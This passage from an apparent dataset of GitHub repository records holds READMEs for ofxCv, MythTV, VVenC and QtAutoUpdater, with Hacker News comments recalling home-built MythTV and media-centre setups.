`toCv()` and `toOf()` functions. They provide the ability to convert openFrameworks data to OpenCv data and vice versa. For large data, like images, this is done by wrapping the data rather than copying it. For small data, like vectors, this is done by copying the data.\n\nThe rest of ofxCv is mostly helper functions (for example, `threshold()`) and wrapper classes (for example, `Calibration`).\n\n### toCv() and copy()\n\n`toCv()` is used to convert openFrameworks data to OpenCv data. For example:\n\n\tofImage img;\n\timg.load(\"image.png\");\n\tMat imgMat = toCv(img);\n\nThis creates a wrapper for `img` called `imgMat`. To create a deep copy, use `clone()`:\n\n\tMat imgMatClone = toCv(img).clone();\n\nOr `copy()`, which works with any type supported by `toCv()`:\n\n\tMat imgCopy;\n\tcopy(img, imgCopy);\n\n`toCv()` is similar to ofxOpenCv's `ofxCvImage::getCvImage()` method, which returns an `IplImage*`. The biggest difference is that you can't always use `toCv()` \"in place\" when calling OpenCv code directly. In other words, you can always write this:\n\n\tMat imgMat = toCv(img);\n\tcv::someFunction(imgMat, ...);\n\nBut you should avoid using `toCv()` like this:\n\n\tcv::someFunction(toCv(img), ...);\n\nBecause there are cases where in place usage will cause a compile error. More specifically, calling `toCv()` in place will fail if the function requires a non-const reference for that parameter.\n\n### imitate()\n\n`imitate()` is primarily used internally by ofxCv. When doing CV, you regularly want to allocate multiple buffers of similar dimensions and channels. `imitate()` follows a kind of prototype pattern, where you pass a prototype image `original` and the image to be allocated `mirror` to `imitate(mirror, original)`. `imitate()` has two big advantages:\n\n* It works with `Mat`, `ofImage`, `ofPixels`, `ofVideoGrabber`, and anything else that extends `ofBaseHasPixels`.\n* It will only reallocate memory if necessary. This means it can be used liberally.\n\nIf you are writing a function that returns data, the ofxCv style is to call `imitate()` on the data to be returned from inside the function, allocating it as necessary.\n\n### drawMat() vs. toOf()\n\nSometimes you want to draw a `Mat` to the screen directly, as quickly and easily as possible, and `drawMat()` will do this for you. `drawMat()` is not the most optimal way of drawing images to the screen, because it creates a texture every time it draws. If you want to draw things efficiently, you should allocate a texture using `ofImage img;` *once* and draw it using `img.draw()`.\n\n1. Either use `Mat mat = toCv(img);` to treat the `ofImage` as a `Mat`, modify the `mat`, then `img.update()` to upload the modified pixels to the GPU.\n2. Alternatively; call `toOf(mat, img)` each time after modifying the `Mat`. This will only reallocate the texture if necessary, e.g. when the size has changed.\n\n\n# Working with OpenCv 2\n\nOpenCv 2 is an incredibly well designed API, and ofxCv encourages you to use it directly. Here are some hints on using OpenCv.\n\n### OpenCv Types\n\nOpenCv 2 uses the `Mat` class in place of the old `IplImage`. Memory allocation, copying, and deallocation are all handled automatically. `operator=` is a shallow, reference-counted copy. A `Mat` contains a collection of `Scalar` objects. A `Scalar` contains a collection of basic types (unsigned char, bool, double, etc.). `Scalar` is a short vector for representing color or other multidimensional information. The hierarchy is: `Mat` contains `Scalar`, `Scalar` contains basic types.\n\nDifferent functions accept `Mat` in different ways:\n\n* `Mat` will create a lightweight copy of the underlying data. It's easy to write, and it allows you to use `toCv()` \"in-place\" when passing arguments to the function.\n* `Mat&` allows the function to modify the header passed in. This means the function can allocate if necessary.\n* `const Mat&` means that the function isn't going to modify the underlying data. This should be used instead of `Mat` when possible. It also allows \"in-place\" `toCv()` usage.\n\n### Mat creation\n\nIf you're working with `Mat` directly, it's important to remember that OpenCv talks about `rows` and `cols` rather than `width` and `height`. This means that the arguments are \"backwards\" when they appear in the `Mat` constructor. Here's an example of creating a `Mat` wrapper for some grayscale `unsigned char* pixels` for which we know the `width` and `height`:\n\n\tMat mat = Mat(height, width, CV_8UC1, pixels, 0);\n\n### Mat operations\n\nBasic mathematical operations on `Mat` objects of the same size and type can be accomplished with matrix expressions. Matrix expressions are a collection of overloaded operators that accept `Mat`, `Scalar`, and basic types. A normal mathematical operation might look like:\n\n\tfloat x, a, b;\n\t...\n\tx = (a + b) * 10;\n\nA matrix operation looks similar:\n\n\tMat x, a, b;\n\t...\n\tx = (a + b) * 10;\n\nThis will add every element of `a` and `b`, then multiply the results by 10, and finally assign the result to `x`.\n\nAvailable matrix expressions include mathematical operators `+`, `-`, `/` (per element division), `*` (matrix multiplication), `.mul()` (per-element multiplication). As well as comparison operators `!=`, `==`, `<`, `>`, `>=`, `<=` (useful for thresholding). Binary operators `&`, `|`, `^`, `~`. And a few others like `abs()`, `min()`, and `max()`. For the complete listing see the OpenCv documention or `mat.hpp`.\n\n# Code Style\n\nofxCv tries to have a consistent code style. It's most similar to the K&R variant used for Java, and the indentation is primarily determined by XCode's auto-indent feature.\n\nMultiline comments are used for anything beyond two lines.\n\nCase statements have a `default:` fall-through with the last case.\n\nWhen two or three similar variables are initialized, commas are used instead of multiple lines. For example `Mat srcMat = toCv(src), dstMat = toCv(dst);`. This style was inherited from reading Jason Saragih's FaceTracker.\n\n- - --\n\n*ofxCv was developed with support from [Yamaguchi Center for Arts and Media](http://ycam.jp/).*\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "MythTV/mythtv", "link": "https://github.com/MythTV/mythtv", "tags": [], "stars": 644, "description": "The official MythTV repository", "lang": "C++", "repo_lang": "", "readme": "[![build](https://github.com/MythTV/mythtv/workflows/master/badge.svg)](https://github.com/MythTV/mythtv/actions)\n[![Coverity scan](https://scan.coverity.com/projects/153/badge.svg)](https://scan.coverity.com/projects/mythtv)\n[![GitHub issues](https://img.shields.io/github/issues/MythTV/mythtv)](https://github.com/MythTV/mythtv/issues)\n[![GitHub pull requests](https://img.shields.io/github/issues-pr/MythTV/mythtv)](https://github.com/MythTV/mythtv/pulls)\n![GitHub top language](https://img.shields.io/github/languages/top/MythTV/mythtv)\n\n\n# Welcome to MythTV\n\n* Documentation\n * [Documentation/Wiki](https://www.mythtv.org/wiki)\n * [User Manual](https://www.mythtv.org/wiki/User_Manual:Index)\n * [FAQ](https://www.mythtv.org/wiki/Frequently_Asked_Questions)\n\n* User and developer discussion\n * [Forums](https://forum.mythtv.org)\n * [Mailing lists](https://lists.mythtv.org/mailman/listinfo)\n * [IRC](https://www.mythtv.org/wiki/IRC)\n * [Users](https://web.libera.chat/?nick=Guest?#mythtv-users): ircs://irc.libera.chat:6697/mythtv-users (Libera.\u200bChat, #mythtv-users)\n * [Developers](https://web.libera.chat/?nick=Guest?#mythtv): ircs://irc.libera.chat:6697/mythtv (Libera.\u200bChat, #mythtv)\n\n* License\n * MythTV is licensed under the GPLv2, see LICENSE for details\n * This applies to all code unless otherwise stated in the source files or to code in an external/ directory\n\n* Contributions\n * If you have patches for a new feature or a bug fix, please consider forking the project on ![Github](https://github.com/MythTV/mythtv) and creating a pull request.\n * Please note: If you create a pull request, please take care to follow the Pull Request checklist.\n * We only support code that is from the canonical MythTV repository at https://github.com/MythTV. For other forks of MythTV, please send bug reports to the owners of the fork where the code was committed.\n * [Open a new issue](https://github.com/MythTV/mythtv/issues/new/choose)\n * [Create a pull request](https://github.com/MythTV/mythtv/compare)\n\n* Development\n * [Source code documentation (doxygen)](https://code.mythtv.org/doxygen)\n * [Coding standards](https://www.mythtv.org/wiki/Coding_Standards)\n * [Buildbot status](https://code.mythtv.org/buildbot)\n * [Github workflows](https://github.com/MythTV/mythtv/actions)\n * [cppcheck report](https://code.mythtv.org/cppcheck)\n * [Coverity scan](https://scan.coverity.com/projects/mythtv)\n * [Translation status](http://www.insidethex.co.uk/mythtv/translation-status/master)\n * [Old ticketing system (trac)](https://code.mythtv.org/trac)\n", "readme_type": "markdown", "hn_comments": "Wow, had no idea this thing was still around. Takes me back to neo Kodi/XBMC/Windows ME days. So much hardware and software to accomplish what a small stick does today.I tired for along time to get MythTV working with limited success. The Silicon Dust tuners were new at the time and support was spotty. I eventually gave up and used Windows MCE but it was limited to a single TV.I ended up replacing all of it with a 1st Gen TabloTV, Plex and a Roku. I'm still rocking that TabloTV today. There's something to be said for having an appliance that just works.I'm still rocking my 13 year old SageTV installation. Even the hardware clients are still working well. So grateful they were allowed to open source the software after Google acquired it.Looks like only one small past thread:MythTV: An Open Source Digital Video Recorder - https://news.ycombinator.com/item?id=29634491 - Dec 2021 (3 comments)I loved MythTV, but I moved to a valley so I can't pull in any OTA broadcasts anymore :(Love mythtv. I've been using it since about 2003 or so. It was definitely a janky experience in the beginning, but once I was able to ditch needing an IR blaster it became an absolute pleasure to setup and use.Oh man, I still have my hauppauge wintv card. Useless these days with analog broadcasts no longer being a thing.If you're curious about the version number, it was changed from 0.xx to xx.0 for release 29. https://www.mythtv.org/wiki/Frequently_Asked_Questions#When_...Wanna do it with a retired pc? I recommend ps3 usb tv tuners. aka \"Play TV\" plentiful on second hand sights. Each has 2 tuners in it. Do you even need 2 of these devices to get 4? Ever had a 3rd thing to record or watch simultaneously? Might as well, they are very cheap.xbmc with the myth plugin on the frontend is great if you own the thing that drives your tv screen. If you use appletv it seems you don't own it and can't run xbmc or mythtv frontend on it. But you can pay apple a sub and then also pay again for anything you might want to watch out of their stunningly limited selection. That's always apple's solution: Pay apple more to get something that isn't what you wanted...the auto commercial skipping was the killer app feature of MythTV. Really enjoyed MythTV.Havn't looked at it; but, wish it would work with streaming services / on-demand.MythTV stats from my house media server:Number of shows: 442Number of episodes: 25061First recording: Monday February 19th, 2007Last recording: Sunday February 5th, 2023Total Running Time: 15 years 11 months 16 days 5 hrs 30 minsTotal Recorded: 2 years 1 month 13 days 18 minsPercent of time spent recording: 13%Specs: 2-core Intel CPU, 8GB RAM, 250 GB SATA SSD root, 6TB of mirrored storage, which is perpetually nearly full.I tried to get this to work multiple times around 2004. This might be where I first dove into linux. I gave up every time. I ended up using windows media center which worked flawlessly for years. I moved on to plex and a hdtvhomerun when they released it (it handles deleting old series, etc). About a year ago I realized I don't really watch live TV anymore and unplugged it.MythTV was the reason I bought and assembled my first x86 PC. I even bought a copy of Red Hat Linux 8 Personal (before Fedora) to run on it. That system became my main desktop PC and is still running more than 20 years later -- like a Ship of Theseus, with every hardware and software component upgraded multiple times. I'm not a progammer but I wanted to help fix bugs and add features, so it was also the reason I learned C++ and MySQL.I still use MythTV (with additional PCs as backends and frontends) to record Comcast digital cable with HDHomerun Cable Card tuners. It also serves my small library of music files and can play DVDs and BluRay discs. I've ripped 4k UHD BluRay discs using MakeMKV and MythTV can play the files but the colors are wrong since a lot of the plumbing needs HDR support.First I thought I had clicked something that showed really old postings. I had no idea MythTV would still be around.\nI never used MythTV though; I used Freevo in the 2000s. Worked quite well once I had it configured. Every once in a while I looked over the fence to see if the DVRs were greener on the other side, but never got around trying MythTV.\nI still have many shows and episodes I saved with Freevo, on old hard drives somewhere.Neat!It'd be nice if there were consumer-ready hardware for something like this. I know a few people with VCRs (yes, in 2023) that still record to tape from their digital receiver and play back over composite.I'm amazed that you can't just buy a device that acts like a VCR, with composite and line in and out, but records and plays back via digital files instead of tape.I want to try this, perhaps using an older Intel Mac mini, but I'm wondering how to \"sell\" it to someone who just wants a VCR.Wow MythTV! This is a blast from the past. I was using this back in ~2006 or so. It sorta worked haha.It's ashame that MythWeb isn't under active development anymore[0]. The MythWeb change log in the 0.33 release doesn't have any commits newer than June 4, 2022.Maybe I'm weird but I use MythWeb exclusively even though I run MythTV on my office workstation. mythfrontend is nice but I find it easier (read: more window manager-friendly) to use mpv to play recordings.[0] https://www.mythtv.org/wiki/MythWebBig fan of MythTV here and daily user forever now.Paired with an HDHomerun and Jellyfin, MythTV really gives one a pretty good poor man's Youtube TV with no recurring fees. One of mine runs in a virtual machine in the garage at my family's farm, with a custom script beaming me my childhood local news to enjoy over coffee in the morning.Damn, nostalgia. MythTV, DVR's, ahem, pirate keys for deco's... good times.Now I don't want a TV near me in kilometers.I used MythTV extensively in the late 2000s to capture over the air (OTA) tv. My kids were young and it was a terrific way to capture tv shows for them (and for me when doing 2AM feedings).It's ability to identify and skip commercials was awesome and I'm sure it's gotten better. The biggest issues I had were hardware related to the capture devices and getting remotes to work.Honestly, given the state of streaming (40 different services all carrying different content), it might be worth looking at again.I used MythTV for several years, until Comcast went digital in my neck of the woods, and my tuner card was useless. What do people tune to content with now? Is it all IR control of a cable box?I've used MythTV since something like 2004. Still great to use for Digital OTA broadcasts (and free-to-air satellite / DVB if that's available in your area). Cable DRM has unfortunately made it much less useful for recording cable broadcasts, thanks to them being allowed to encrypt all QAM signals, and now aren't required to support/provide CableCards either: https://www.nexttv.com/news/charter-cuts-off-cablecard-suppo...Sort of waiting for some new iteration of what \"popcorn time\" was. With all the fragmentation of content across different providers, and more aggressive actions on account sharing, crossing region restrictions, etc...it feels like average people are now starting to complain a lot.There is an opening for a very beginner friendly pirate platform to rise again. Not because nobody wants to pay exactly, but because doing it legally is complex now.This takes me back! The first home server I ran had a TV capture card, ran Gentoo with MythTV, was hooked up to the living room TV, and was a pretty good source of entertainment for the gradstudent apartment I shared. Saving broadcasts, trimming out commercials, ... and of course fun with running a Linux server.Good to see the project still going 10-15 years after I first heard of it (though I haven't used it in a long time)!Check out channels dvr (getchannels.com/dvr) as a modern, actively developed DVR. I love it. I'm running Channels on an ESXi host and just use the AppleTV app as the interface.I was always very impressed with MythTV. It was the first project that I saw that made really good use of versioning their mysql database with SQL queries to change the schema linked to the software version.I used it extensively. I obsessively recorded everything off over the air digital TV and wrote it to DVDs. I had a little script to look up ratings of movies in IMDB, apply weighting factors due to personal tastes and record all the ones which made the grade. I'd then edit the commercials out and burn to DVDs all losslessly.However, this all came to an end when my 2 year old son took the running hosepipe from the garden one summer, through the open patio doors into the house and proceeded to fill up the MythTV computer with water (along with the TV, VCR, DVD player and sofa!).I never quite had the heart to resurrect the system after that and it was an end to my MythTV obsession. It was fun while it lasted.I have fond memories of using MythTV. It was a great alternative to Microsoft Media Center. Automatic advertisement removal, great scheduled recording capabilities. As most of this functionality comes with your TV or settopbox today, I wonder how popular MythTV is today.Headless MythTV Backend on a low power m1max-64GB with 8 USB3.1 ports would be perfect. I sure as hell would never run a mission critical data processing app on those chips, but like Amiga, they are built for A/V, ML and rendering workloads\u2026and they don\u2019t draw much nrg or generate much heat, which is important in a household setup.Likewise, much of modern automotive infotainment is just catching up to where the duct-tape geniuses of mp3car.com were twenty years ago.Haha yeah. I had this cool horizontal micro ATX case that housed a full computer and still looked like a media device. Had to use risers to mount the GPU horizontal.Then a few years later a single Raspberry Pi did the trick.Wasn't Plex founded out of some of the remnants of the XBMC team?I can't claim to have hacked on MythTV or XBMC, but I certainly used them back then, and worked on television set-top box software for much of the ~2001-2017 time frame. As a systems programmer for these devices, I'm afraid I don't have much insight into high-level details like content licensing.However, as a developer of commercial products in those days, I can say that our hands were tied in some ways. For example, showing the electronic program guide as a grid was problematic due to patents owned by TV Guide. I suspect the grassroots projects were able to play a bit more fast and loose with these things, thus leading to the UI differences you observed.My parents didn't want me taking apart the Xbox so I had to convince them I knew what I was doing. Finally got a modchip in 2002. After putting it in, the Xbox didn't boot up. I didn't know why because I was an idiot 13 year old who didn't know what they were doing and getting concrete instructions on what to do was harder back then. My parents weren't happy.Yes,. a great many hours.\nBuilding PC's, trying to make them quiet enough to tolerate. Buying expensive Haupage hardware encoding boards, DTV tuners and programmable remotes. Getting the software to work at the right resolution, getting the driver to work.In Australia TV listing were copywritable, so we had to crowdsource that too.I built HTPC using ShuttlePC with MythTV back then. I also integrated home automation to control the lights and audio distribution around the house using X-10. Back then, the phone were still analog and one of the X-10 light module would turns on when I get a call. I had a Sony projector with a 105 in screen and 5.1 surround sound. When the movie starts the lights would dim and the curtains would close. Getting a cable card was expensive back then. I had DirecTV so set up an IR relay with X-10 to control the channels.\nTorn out the walls to run all the wires and consolidated everything in a closet. It was a sweet set up. Good times.Yes, I started with a massive Windows 8 Media center PC in 2003 which evolved to an Xbox1 with XBMC, followed by a couple of all in one PCs which could load standalone XBMC Linux based kernels by 2010.Around 2015, I switched to having a Synology NAS hold the content with small streaming devices around the house with Plex running on both ends.But these days 99% of the content we want is on Netflix, HBO Max, or Disney+. We occasionally rent movies via AppleTV. I can get all the content I want more conveniently through these services. And I am rarely debugging the setup during a family movie night while my wife and daughters groan about how my stuff never works.I hacked on the original TiVo and MythTV a bit; did not contribute much back, but I had a lot of fun. Video output from my few boxes were fed back into NTSC modulators; I added extra channels to the CATV distribution and could tune into my TV, music, music video, and movie library from any TV. Basically I built a mini VoD system in my house. I tried to keep this up into later years to little success using gradually more purpose built hardware. I think the dream finally died for me after my Dune HD gave up the ghost.I started an Internet radio business in 1998 so this actually predated my involvement in the HTPC stuff. We programmed several genre stations of our own, properly and legally and built audio encoding appliances that we would sell as a simulcasting service to traditional broadcast stations. Even though we were operating legally and paying licensing, we eventually got killed by the Metallica v Napster suit which prompted the licensing agencies to retool their fees and prompted commercial broadcasters at the time to put a hold on all Internet streaming.Everything in one place is what customers want, but the businesses that own the stuff want customer attention and lock in. Why anyone would want to dedicate their career to enforcing this attitude for a giant multinational corporation is beyond me. This idiocy is the reason the youtube mobile app doesnt let you watch video in the background and hides the clock, for instance. It's untenable. Ultimately I gave up on the whole mess. I still own some TVs, but these days they are mostly off. I don't have the stomach for it.The music services fortunately have mostly figured it out: there are a number of places where you can choose to either select and purchase from or subscribe in bulk to \"nearly all the commercially distributed music there is\" for a fee commiserate with your desire to either buy the product or be the product. For video, it's alphabet shit soup.I started back in the Windows XP Media Center days. Now I've settled on a simpler setup, using Plex on a PC, and the built-in apps on my smart-TV.Ha, yes. I purchased an ATI TV Wonder Digital Cable Tuner[1] in 2010 and hooked it up to my custom built HTPC running Windows 8 PC Media Center edition so I can use it as my DVR. I watched TV like that for 8 years and enjoyed every minute of it. I even developed a Windows Media Center app in MCML[2] that allowed you to access streaming sporting events on ESPN[3].[1] https://www.cnet.com/products/ati-tv-wonder-digital-cable-tu...[2] https://docs.microsoft.com/en-us/previous-versions/windows/d...[3] https://www.amarkota.com/portfolio/espn3...ah yes...countless hours were spent on my MythBox, which mostly worked. Before my MythBox went out the door, it had four TV cards a couple of huge drives and a ton of memory. It was a very nice machine. Before that, I used the XBMC on a couple of Xboxes. I remember using Splinter Cell and a memory card, I think, to perform the hack to get it going. That was a lot of fun.Fast forward to today, I was using a a little single board computer (le potato) to run Kodi. That worked okay but always required hacking to get it working with Netflix or other services. I finally gave up and bought the Nvidia Shield Pro. It works great and I haven't had a single (major) issue since buying it. It runs Android TV and allows me to install Kodi as an app. I still run Kodi along with many of the other apps. No longer do I have to run into the room and ssh into the box to get it to do something.While I am happy with the Nvidia Shield, in my heart, I feel like I gave up some freedom. The early days of HTPC were about figuring out how to make things work without the infrustructure of any big companies (other than the $19.99/year I paid to schedulesdirect!). Just a community of people making things work they way they wanted them to work. Yep. I am a sell out (that is watching tv with a knowing smile on his face).Helped a buddy who wanted to sell a HTPC box, based on a mini-ITX board in a neat small case. The motherboard he'd picked had IR remote support, and it would be running XBMC.Main problem was mainly price, as it often is. No way it could have approached the price of my NVIDIA Shield TV box.But he did make a few and sold it to people he knew.I helped him automate the Linux install and setup, so he could just drop a txt file with owner details and the image on a USB stick and boot from it to install a new box. This became my first exposure to XBMC, which I liked quite a lot.I am mostly disappointed where this all ended up, especially with Netflix. The HTPC movement was all about serving up our bought content at top quality. Nowadays you don't own any content, you rent it all and its all streamed at poor bitrate with often worse audio options than what we had 20 years ago. Netflix instead of freeing existing content and spreading it across the globe ended up copying the cable company production of its own content and isolating that content to its own platform model to be sold with a monthly rental along with all its other content you don't want.Very little of what the early HTPC movement and Jellyfin/Kodi are today has made it into the official streaming services and its every bit as geolocked as cable services were. Netflix is cable on the internet, none of the devices today are anything but multiple cable devices served over the internet, they share very little in principles with the early HTPC movement. DRM has become ever more prevalent in TV and movies not less.Hello F.B.I.,Nice try.Sincerely,Guy who owns alot of DVDsWhy not just hit mute and watch the closed captions. What sounds from a soccer game do you actually want to hear?", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "fraunhoferhhi/vvenc", "link": "https://github.com/fraunhoferhhi/vvenc", "tags": ["encoder", "vvc", "video", "codec", "h266"], "stars": 644, "description": "Fraunhofer Versatile Video Encoder (VVenC)", "lang": "C++", "repo_lang": "", "readme": "# Fraunhofer Versatile Video Encoder (VVenC)\n\nThe Fraunhofer Versatile Video Encoder (VVenC) is a fast and efficient H.266/VVC encoder implementation with the following main features:\n- Easy to use encoder implementation with five predefined quality/speed presets;\n- Perceptual optimization to improve subjective video quality, based on the XPSNR visual model;\n- Extensive frame-level and task-based parallelization with very good scaling;\n- Frame-level single-pass and two-pass rate control supporting variable bit-rate (VBR) encoding;\n- Expert mode encoder interface available, allowing fine-grained control of the encoding process.\n\n## Information\n\nSee the [Wiki-Page](https://github.com/fraunhoferhhi/vvenc/wiki) for more information:\n\n* [Build information](https://github.com/fraunhoferhhi/vvenc/wiki/Build)\n* [Usage documentation](https://github.com/fraunhoferhhi/vvenc/wiki/Usage)\n* [VVenC performance](https://github.com/fraunhoferhhi/vvenc/wiki/Encoder-Performance)\n* [License](https://github.com/fraunhoferhhi/vvenc/wiki/License)\n* [Publications](https://github.com/fraunhoferhhi/vvenc/wiki/Publications)\n* [Version history](https://github.com/fraunhoferhhi/vvenc/wiki/Changelog)\n\n## Build\n\nVVenC uses CMake to describe and manage the build process. A working [CMake](https://cmake.org/) installation is required to build the software. In the following, the basic build steps are described. Please refer to the [Wiki](https://github.com/fraunhoferhhi/vvenc/wiki/Build) for the description of all build options.\n\n### How to build using CMake?\n\nTo build using CMake, create a `build` directory and generate the project:\n\n```sh\nmkdir build\ncd build\ncmake .. \n```\n\nTo actually build the project, run the following after completing project generation:\n\n```sh\ncmake --build .\n```\n\nFor multi-configuration projects (e.g. Visual Studio or Xcode) specify `--config Release` to build the release configuration.\n\n### How to build using GNU Make?\n\nOn top of the CMake build system, convinence Makefile is provided to simplify the build process. To build using GNU Make please run the following:\n\n```sh\nmake install-release \n```\n\nOther supported build targets include `configure`, `release`, `debug`, `relwithdebinfo`, `test`, and `clean`. Refer to the Wiki for a full list of supported features.\n\n## Citing\n\nPlease use the following citation when referencing VVenC in literature:\n\n```bibtex\n@InProceedings{VVenC,\n author = {Wieckowski, Adam and Brandenburg, Jens and Hinz, Tobias and Bartnik, Christian and George, Valeri and Hege, Gabriel and Helmrich, Christian and Henkel, Anastasia and Lehmann, Christian and Stoffers, Christian and Zupancic, Ivan and Bross, Benjamin and Marpe, Detlev},\n booktitle = {Proc. IEEE International Conference on Multimedia Expo Workshops (ICMEW)},\n date = {2021},\n title = {VVenC: An Open And Optimized VVC Encoder Implementation},\n doi = {10.1109/ICMEW53276.2021.9455944},\n pages = {1-2},\n}\n```\n\n## Contributing\n\nFeel free to contribute. To do so:\n\n* Fork the current-most state of the master branch\n* Apply the desired changes\n* Add your name to [AUTHORS.md](./AUTHORS.md)\n* Create a pull-request to the upstream repository\n\n## License\n\nPlease see [LICENSE.txt](./LICENSE.txt) file for the terms of use of the contents of this repository.\n\nFor more information, please contact: vvc@hhi.fraunhofer.de\n\n**Copyright (c) 2019-2023, Fraunhofer-Gesellschaft zur F\u00f6rderung der angewandten Forschung e.V. & The VVenC Authors.**\n\n**All rights reserved.**\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "Skycoder42/QtAutoUpdater", "link": "https://github.com/Skycoder42/QtAutoUpdater", "tags": ["qt", "module", "updater", "gui-library", "automatic"], "stars": 644, "description": "A Qt library to automatically check for updates and install them", "lang": "C++", "repo_lang": "", "readme": "# QtAutoUpdater\n\nThe Qt auto updater library is a library to automatically check for updates and install them based on various backends. This repository includes:\n\n - A library with the basic updater (without any GUI)\n - An automated Widgets GUI\n - An automated Quick GUI\n\n[![Travis Build Status](https://travis-ci.org/Skycoder42/QtAutoUpdater.svg?branch=master)](https://travis-ci.org/Skycoder42/QtAutoUpdater)\n[![Appveyor Build status](https://ci.appveyor.com/api/projects/status/5iw2byrvnsdfytxv/branch/master?svg=true)](https://ci.appveyor.com/project/Skycoder42/qtautoupdater/branch/master)\n[![Codacy Badge](https://api.codacy.com/project/badge/Grade/a5b2e3cc66c644869515d2f3a5c3ff49)](https://www.codacy.com/app/Skycoder42/QtAutoUpdater)\n\n> The library was recently updated to version 3.0. That release differes strongly from 2.1. Use the [Porting Guide](porting_guide.md) to get your application from 2.1 to 3.0!\n\n## Features\n### Core Library\n- Automatic Check for updates\n- Install updates in parallel or after exit\n- Simple update scheduling mechanism for the running instance\n- Currently 7 different backends are supported:\n\t- [Qt Installer Framework](https://doc.qt.io/qtinstallerframework/index.html) (For cross platform desktop)\n\t- [PackageKit](https://www.freedesktop.org/software/PackageKit/) (Works with most linux package managers)\n\t- [Chocolatey](https://chocolatey.org/) (A package manager for Windows)\n\t- [Homebrew](https://brew.sh/) (A package manager for macOs)\n\t- [Google Playstore](https://play.google.com/store) (for Android apps)\n\t- A custom backend that checks for updates based on a HTTP-request and can download and execute any update tool\n\n### GUI Libraries\n- Applies for both, the widgets and the quick GUI\n- Automated classes that show dialogs etc. based on a configuration and guide the user through the update process\n - customizable: you can decide what to show\n - extended information dialog or simple dialog to show basic information about the update\n- A custom menu action and button for easy integration into the GUI\n- *Prepared* for translation and fully translated for:\n\t- German\n\t- French\n\t- Spanish (outdated)\n\t- Arabic\n\n#### Screenshots\nHere some random sample screenshots of the gui (The rocket of the information dialog is the \"application icon\" and depends on your application). These are various parts of the GUI in various different styles. The first row shows elements from the widgets module, the second from quick\n\n Element\t\t\t| Widgets Screenshots\t\t\t\t\t\t\t\t| Quick Screenshots\n--------------------|---------------------------------------------------|-------------------\n Progress Dialog\t| ![macOs Style](./doc/images/mac_progress.png)\t\t| ![Default Style](./doc/images/default_progress.png)\n Information Dialog\t| ![Windows Style](./doc/images/win_info.png)\t\t| ![Material Style](./doc/images/material_info.png)\n Update Button\t\t| ![Fusion Style](./doc/images/fusion_button.png)\t| ![Imagine Style](./doc/images/imagine_button.png)\n Install Wizard\t\t| ![KDE Style](./doc/images/kde_installer.png)\t\t| ![Universal Style](./doc/images/universal_installer.png)\n\n## Requirements\n- The core library only depends on QtCore\n- The widgets library only depends on QtWidgets\n- The quick library requires Qt Quick Controls 2\n- The plugins have different requirements. Typically the package managers and/or libraries associated with that plugin\n\n## Download/Installation\nThere are multiple ways to install the Qt module, sorted by preference:\n\n1. Package Managers: The library is available via:\n\t- **Arch-Linux:** AUR-Repository: [`qt5-autoupdater`](https://aur.archlinux.org/packages/qt5-autoupdater/)\n\t- **MacOs:**\n\t\t- Tap: [`brew tap Skycoder42/qt-modules`](https://github.com/Skycoder42/homebrew-qt-modules)\n\t\t- Package: `qtautoupdater`\n\t\t- **IMPORTANT:** Due to limitations of homebrew, you must run `source /usr/local/opt/qtautoupdater/bashrc.sh` before you can use the module.\n2. Simply add my repository to your Qt MaintenanceTool (Image-based How-To here: [Add custom repository](https://github.com/Skycoder42/QtModules/blob/master/README.md#add-my-repositories-to-qt-maintenancetool)):\n\t1. Start the MaintenanceTool from the commandline using `/path/to/MaintenanceTool --addRepository ` with one of the following urls (Alternatively you can add it via the GUI, as stated in the previously linked GUI):\n\t\t- On Linux: https://install.skycoder42.de/qtmodules/linux_x64\n\t\t- On Windows: https://install.skycoder42.de/qtmodules/windows_x86\n\t\t- On Mac: https://install.skycoder42.de/qtmodules/mac_x64\n\t2. A new entry appears under all supported Qt Versions (e.g. `Qt > Qt 5.13 > Skycoder42 Qt modules`)\n\t3. You can install either all of my modules, or select the one you need: `Qt Autoupdater`\n\t4. Continue the setup and thats it! you can now use the module for all of your installed Kits for that Qt\n3. Download the compiled modules from the release page. **Note:** You will have to add the correct ones yourself and may need to adjust some paths to fit your installation!\n4. Build it yourself! **Note:** This requires perl to be installed. If you don't have/need cmake, you can ignore the related warnings. To automatically build and install to your Qt installation, run:\n\t- Install and prepare [qdep](https://github.com/Skycoder42/qdep#installation)\n\t- Install any potential dependencies for the plugins you need\n\t- Download the sources. Either use `git clone` or download from the releases. If you choose the second option, you have to manually create a folder named `.git` in the projects root directory, otherwise the build will fail.\n\t- `qmake`\n\t- `make` (If you want the tests/examples/etc. run `make all`)\n\t- Optional steps:\n\t\t- `make doxygen` to generate the documentation\n\t\t- `make -j1 run-tests` to build and run all tests\n\t- `make install`\n\n\n## Usage\nThe autoupdater is provided as a Qt module. Thus, all you have to do is add the module, and then, in your project, add `QT += autoupdatercore` or `QT += autoupdaterwidgets` to your .pro file - depending on what you need! For QML, you can import the library as `de.skycoder42.QtAutoUpdater.Core` and `de.skycoder42.QtAutoUpdater.Quick`.\n\n**Note:** When preparing an application for the release, the `windeployqt` and `macdeployqt` will *not* include the plugins! You have to manually copy matching libraries from `/updaters`. The `d` suffix is used on windows and the `_debug` suffix on macos for the debug version of the plugins.\n\n### Getting started\nThe following examples assumes you are using the Qt Installer Framework as backend. The usage is similar for all backends, as you only have to adjust the configuration. This document expects you to already know the installation system you are using. If you are new to all of this, I can personally recommend you to use the Qt Installer Framework. It is relatively easy to use and works for Linux, Windows and macOs.\n\nHere are some links that will explain how to create an online-installer using the QtIFW framework. Once you have figured out how to do that, it's only a small step to the updater library:\n - [QtIFW - Tutorial: Creating an Installer](https://doc.qt.io/qtinstallerframework/ifw-tutorial.html): Check this to learn how to create an installer in general. Don't be afraid, it's a very short tutorial\n - [QtIFW - Creating Online Installers](https://doc.qt.io/qtinstallerframework/ifw-online-installers.html): This page will tell you how to create an online installer from your offline installer - in just 2 steps\n - [QtIFW - Promoting Updates](https://doc.qt.io/qtinstallerframework/ifw-updates.html): And this site explains how to create updates\n\n### Examples\nSince this library requires the maintenancetool that is deployed with every Qt Installer Framework installation, the examples cannot be tested without a maintenancetool! If you intend to recreate this example, set the path to the `MaintenanceTool` that is deployed with the installation of Qt (or any other maintenancetool). So make shure to adjust the path if you try to run the examples.\n\n#### Updater\nThe following example shows the basic usage of the updater. Only the core library is required for this example. 